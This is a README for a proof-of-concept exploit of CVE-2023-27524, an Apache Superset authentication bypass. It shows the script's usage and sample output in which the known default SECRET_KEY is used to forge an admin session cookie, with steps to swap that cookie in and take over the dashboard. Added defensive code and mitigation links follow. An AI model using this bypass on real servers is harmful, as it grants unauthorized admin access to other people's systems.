A POC for the all new CVE-2023-27524 which allows for authentication bypass and gaining access to the admin dashboard.
# CVE-2023-27524: Apache Superset Auth Bypass
Script to check whether an Apache Superset server is vulnerable to CVE-2023-27524 and, if it is, forge a session cookie with `user_id = 1`, which is usually the `admin` user, allowing for authentication bypass and access to the dashboard. Currently, there are about 3000 servers worldwide running Apache Superset.
## Usage
```
usage: python3 CVE-2023-27524.py --url URL
```
## Basic Example
```
% python3 CVE-2023-27524.py --url
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
```
## Mitigations
Follow the [instructions here](https://superset.apache.org/docs/installation/configuring-superset/) to generate and configure a Flask SECRET_KEY. The `superset` CLI tool can be used to [rotate the SECRET_KEY](https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation) so that existing database connection information is preserved.
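The mitigation above boils down to one thing: never run Superset with the shipped default `SECRET_KEY`, because anyone who knows it can sign a session cookie for any user. The following is an added example (not code from this PoC or from Apache Superset) of a startup guard a defender can drop into `superset_config.py`: it rejects the documented default `CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET` (the only default value shown on this page; the set is meant to be extended), rejects keys that are too short, and generates a replacement with the same entropy the Superset docs' `openssl rand -base64 42` produces. The names `check_secret_key`, `enforce_secret_key`, `generate_secret_key` and `KNOWN_DEFAULT_KEYS` are this example's own, and the `SUPERSET_SECRET_KEY` environment variable is an assumed deployment convention, not a Superset setting.

```python
"""Added example: refuse a default or weak Flask SECRET_KEY before Superset
starts, and produce a strong replacement. Not part of the PoC or of Superset."""
import os
import secrets

# The default that ships in Superset's config.py, as reported by the PoC output above.
# Extend this set with any other placeholder values your deployment templates carry.
KNOWN_DEFAULT_KEYS = {
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
}

# Floor for key length; the docs' `openssl rand -base64 42` yields 42 random bytes.
MIN_KEY_BYTES = 32


def check_secret_key(key):
    """Return a list of problems with `key`; an empty list means it is acceptable."""
    problems = []
    if key is None or key == "" or key == b"":
        problems.append("SECRET_KEY is unset; session cookies cannot be signed safely")
        return problems
    if not isinstance(key, (str, bytes)):
        problems.append("SECRET_KEY must be str or bytes")
        return problems
    text = key.decode("utf-8", "replace") if isinstance(key, bytes) else key
    if text in KNOWN_DEFAULT_KEYS:
        problems.append("SECRET_KEY is a known default; anyone can forge session cookies")
    if len(text.encode("utf-8")) < MIN_KEY_BYTES:
        problems.append(f"SECRET_KEY is shorter than {MIN_KEY_BYTES} bytes")
    return problems


def generate_secret_key(nbytes=42):
    """Return a URL-safe random key built from `nbytes` bytes of OS entropy."""
    return secrets.token_urlsafe(nbytes)


def enforce_secret_key(key):
    """Startup guard: raise RuntimeError listing every problem, else return the key."""
    problems = check_secret_key(key)
    if problems:
        raise RuntimeError("Refusing to start Superset: " + "; ".join(problems))
    return key


if __name__ == "__main__":
    # Constructed demonstration values: the shipped default, a short key, a fresh key.
    for candidate in ("CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET", "short", generate_secret_key()):
        print(repr(candidate)[:48], "->", check_secret_key(candidate) or "OK")
    # Typical superset_config.py usage (assumed env var name):
    #   SECRET_KEY = enforce_secret_key(os.environ.get("SUPERSET_SECRET_KEY"))
```

In `superset_config.py`, assign `SECRET_KEY = enforce_secret_key(...)` so that a misconfigured deployment fails loudly at startup instead of serving forgeable sessions. When replacing a key on an existing instance, use the rotation procedure linked above rather than simply swapping the value, so that encrypted database connection secrets stay readable.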
## Disclaimer
This POC is created for educational purposes only.
## References
* https://github.com/horizon3ai/CVE-2023-27524
* https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/
```
[4.0K] /data/pocs/42e331d575d2d9df207418a5affdcd0749e85246
├── [3.1K] CVE-2023-27524.py
├── [1.0K] LICENSE
├── [1.9K] README.md
└── [ 39] requirements.txt
0 directories, 4 files
```